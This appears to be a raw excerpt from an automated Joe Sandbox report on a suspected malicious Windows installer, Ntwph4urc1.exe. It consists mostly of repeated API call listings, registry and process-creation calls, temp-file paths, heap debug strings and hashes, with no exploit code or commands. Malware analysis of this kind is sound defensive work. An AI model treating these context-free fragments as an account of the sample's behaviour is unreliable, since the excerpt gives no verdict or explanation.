                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                              • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                              • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                              • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 2655323295-2176574564
                                              • Opcode ID: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                              • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                              • Opcode Fuzzy Hash: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                              • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
                                              APIs
                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                              • CharNextW.USER32(00000000), ref: 00405D81
                                              • CharNextW.USER32(00000000), ref: 00405D99
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, xrefs: 00405D6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharNext
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 3213498283-2176574564
                                              • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                              • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                              • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                              • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                              • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-3936084776
                                              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                              • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                              • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                              APIs
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll), ref: 0040268D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp$C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll
                                              • API String ID: 1659193697-1120995959
                                              • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                              • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                              • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                              • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                              • GetTickCount.KERNEL32 ref: 00402FE2
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                              • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                              • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                              • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                              • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 004053F9
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                                • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                              • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                              • CloseHandle.KERNEL32(?), ref: 00405A0D
                                              Strings
                                              • Error launching installer, xrefs: 004059EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              APIs
                                              • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                              • GlobalFree.KERNEL32(0095E768), ref: 00403A49
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-3936084776
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-3125694417
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 73F5116A
                                              • GlobalFree.KERNEL32(00000000), ref: 73F511C7
                                              • GlobalFree.KERNEL32(00000000), ref: 73F511D9
                                              • GlobalFree.KERNEL32(?), ref: 73F51203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                              • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0

                                              Execution Graph

                                              Execution Coverage:0%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:1
                                              Total number of Limit Nodes:0
                                              execution_graph 82326 36982df0 LdrInitializeThunk

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1 369835c0-369835cc LdrInitializeThunk
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 36982df0-36982dfc LdrInitializeThunk
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $ $0
                                              • API String ID: 3446177414-3352262554
                                              • Opcode ID: 85bf7eb3cfd37834cd18fbb1fc12fc84165b70c7d476595a881bc5317507fbad
                                              • Instruction ID: ab529b6c3c726e614ec31f16a1bf886a1f164fb6cd02587d79b46a0fe86b8e6e
                                              • Opcode Fuzzy Hash: 85bf7eb3cfd37834cd18fbb1fc12fc84165b70c7d476595a881bc5317507fbad
                                              • Instruction Fuzzy Hash: 783224B5A083818FE311CF69C884B5BBBE9BB88348F10492EF9D987250D775D949CB52

                                              Control-flow Graph of the function at 369f0274-369f0760 (rendered graph and its executed/not-executed colouring omitted; its block list shows calls to GetPEB and RtlDebugPrintTimes)
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 3446177414-1700792311
                                              • Opcode ID: ac18207bdd3698466fd6f4bdcbb4d71ab85c01a74a0cee17154aae8c6565158b
                                              • Instruction ID: c1ad7982f6efb8584a14ddea6cd0e595be54ec9fa4660c76795eb83a0357ee31
                                              • Opcode Fuzzy Hash: ac18207bdd3698466fd6f4bdcbb4d71ab85c01a74a0cee17154aae8c6565158b
                                              • Instruction Fuzzy Hash: 5BD10E75920784DFDB12CF69C820AAABBFAFF59315F278049E4449F212D736D882CB51
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                              • API String ID: 3446177414-1745908468
                                              • Opcode ID: 0f981b5017999efe04f15ce78cfcf5c7de38d4869ee075171c5930c627d1eb00
                                              • Instruction ID: b6b5263e82c26b7a997a27378f7940cd44e74de38ca68d1fdc0dc1adb10abef2
                                              • Opcode Fuzzy Hash: 0f981b5017999efe04f15ce78cfcf5c7de38d4869ee075171c5930c627d1eb00
                                              • Instruction Fuzzy Hash: BD914236900784DFDB02CFA9C840AAEBBF2FF59794F25805AE445AB262CB35DC41CB51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              • Opcode ID: 6fe79cec528af479ab2de3a852e004b7fc7d487bd2e0c4914978b7e315c9cb7d
                                              • Instruction ID: 4b5c7131b0d5ac3e9716bb541684b70c8bc394824b857e1b051784c835d3a72a
                                              • Opcode Fuzzy Hash: 6fe79cec528af479ab2de3a852e004b7fc7d487bd2e0c4914978b7e315c9cb7d
                                              • Instruction Fuzzy Hash: 5812DC75A20742DFE725CF25C440BA6BFF5EF0931AF668459E4868F642D736E880CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
